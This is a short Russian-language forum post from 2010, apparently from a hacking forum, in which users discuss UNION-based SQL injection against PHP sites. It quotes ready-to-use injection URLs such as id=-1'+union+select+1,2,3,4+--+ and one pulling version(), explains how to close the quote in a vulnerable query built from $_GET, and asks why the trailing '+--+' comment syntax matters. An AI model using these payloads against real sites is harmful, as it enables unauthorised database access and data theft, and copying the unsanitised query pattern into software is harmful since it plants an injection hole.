17.01.2010, 13:43
|
|
Banned
Регистрация: 28.12.2009
Сообщений: 30
С нами:
8615506
Репутация:
0
|
|
Сообщение от .:[melkiy]:.
http://site.ru/script.php?id=-1'+union+select+1,2,3,4+--+
Будет работать при mq=off
PHP код:
mysql_query("SELECT * FROM articles WHERE id=".$_GET."");
Когда стоят кавычки '', запрос получается:
PHP код:
$response=mysql_query("SELECT * FROM articles WHERE id='1+union+select+1,3,4+--+'");
MySql вернет ошибку из-за незакрытой кавычки. Нужно закрыть кавычку и делать запрос:
PHP код:
$response=mysql_query("SELECT * FROM articles WHERE id='1' union select 1,2,3,4+--+'");
Читай: http://forum.antichat.ru/thread19844.htmlСпасибо, помогло. понял. постате ему +.
А теперь расскажите пожалуйста, почему так работает
Код:
.php?id=-1'+union+select+1,version(),3,4,5,6,7,8+--+
а так нет
Код:
.php?id=-1'+union+select+1,version(),3,4,5,6,7,8--
т.е. как влияют плюсики??
Последний раз редактировалось Серёжа393; 17.01.2010 в 14:06..
|
|
|